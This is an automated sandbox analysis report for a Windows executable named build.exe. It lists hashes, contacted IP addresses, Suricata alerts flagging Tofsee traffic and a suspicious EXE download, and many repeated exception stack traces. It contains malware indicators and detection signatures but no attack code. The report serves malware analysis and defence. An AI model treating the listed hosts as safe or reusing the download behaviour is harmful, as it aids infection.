Summary | ZeroBOX

build.exe

Malicious Library DGA ScreenShot Internet API DNS Http API Socket AntiDebug PE File OS Processor Check PE32 AntiVM
Category Machine Started Completed
FILE s1_win7_x6402 July 4, 2021, 11:02 a.m. July 4, 2021, 11:07 a.m.
Size 738.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 f41fd95f121782d8d2f4689ef056d293
SHA256 4b1f8619599a195d1287cbfa9fa9fe2b9c428b40cfd5b5b712acf7d12bf0ef13
CRC32 9F20211E
ssdeep 12288:Fv9GfAXoRSiavuSy34jDq/70uViVkYvghNYl3PurYE4VNgvGZDr5BLcMc+plaA:FlvXmveu734s7RAVDYhMPzssLtDYA
PDB Path C:\racero\hitasenu-rom72_bevurecuw.pdb
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

IP Address Status Action
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
179.38.56.56 Active Moloch
77.123.139.190 Active Moloch
8.209.113.181 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.102:57660 -> 164.124.101.2:53 2027026 ET POLICY External IP Address Lookup DNS Query Device Retrieving External IP Address Detected
TCP 192.168.56.102:49809 -> 77.123.139.190:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49819 -> 77.123.139.190:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 77.123.139.190:443 -> 192.168.56.102:49821 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.102:49820 -> 77.123.139.190:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 77.123.139.190:443 -> 192.168.56.102:49811 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.102:49808 -> 77.123.139.190:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.102:61459 -> 164.124.101.2:53 2023883 ET DNS Query to a *.top domain - Likely Hostile Potentially Bad Traffic
TCP 192.168.56.102:49824 -> 179.38.56.56:80 2002400 ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer) A Network Trojan was detected
TCP 192.168.56.102:49824 -> 179.38.56.56:80 2023882 ET INFO HTTP Request to a *.top domain Potentially Bad Traffic
TCP 192.168.56.102:49823 -> 8.209.113.181:80 2002400 ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer) A Network Trojan was detected
TCP 192.168.56.102:49823 -> 8.209.113.181:80 2020826 ET MALWARE Potential Dridex.Maldoc Minimal Executable Request A Network Trojan was detected
TCP 192.168.56.102:49823 -> 8.209.113.181:80 2022896 ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 A Network Trojan was detected
TCP 8.209.113.181:80 -> 192.168.56.102:49823 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 8.209.113.181:80 -> 192.168.56.102:49823 2023464 ET HUNTING Possible EXE Download From Suspicious TLD Misc activity

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
pdb_path C:\racero\hitasenu-rom72_bevurecuw.pdb
resource name AFX_DIALOG_LAYOUT
resource name GAHELOCESUFEGUC
resource name NEVOM
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
build2+0x8fba2 @ 0x48fba2
build2+0x90ca1 @ 0x490ca1
build2+0xd8e6 @ 0x40d8e6
build2+0xd76f @ 0x40d76f
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 80 78 07 05 0f 84 64 8a 01 00 f6 40 07 3f 0f 84
exception.symbol: _vsnprintf+0xd0 strncpy_s-0x52 ntdll+0x79e58
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 499288
exception.address: 0x77419e58
registers.esp: 1623120
registers.edi: 6488064
registers.eax: 4294967288
registers.ebp: 1623164
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6488064
1 0 0

__exception__

stacktrace:
_vsnprintf+0xa9 strncpy_s-0x79 ntdll+0x79e31 @ 0x77419e31
GetProfileStringW+0x5b74 EnumResourceNamesW-0x40041 kernel32+0x43120 @ 0x75763120
